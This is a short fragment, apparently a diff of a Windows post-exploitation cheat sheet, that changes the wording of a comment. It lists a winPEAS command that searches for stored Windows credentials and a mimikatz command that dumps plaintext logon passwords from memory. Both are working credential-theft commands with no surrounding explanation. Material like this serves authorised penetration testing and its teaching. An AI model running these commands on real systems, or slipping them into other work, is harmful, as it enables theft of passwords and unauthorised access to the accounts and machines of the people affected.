File searching commands¶

 .\winPEASx64.exe quiet cmd windowscreds

-- Extract plaintext passwords from memory using mimikatz:
+- Extract plaintext passwords from memory with mimikatz:

 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"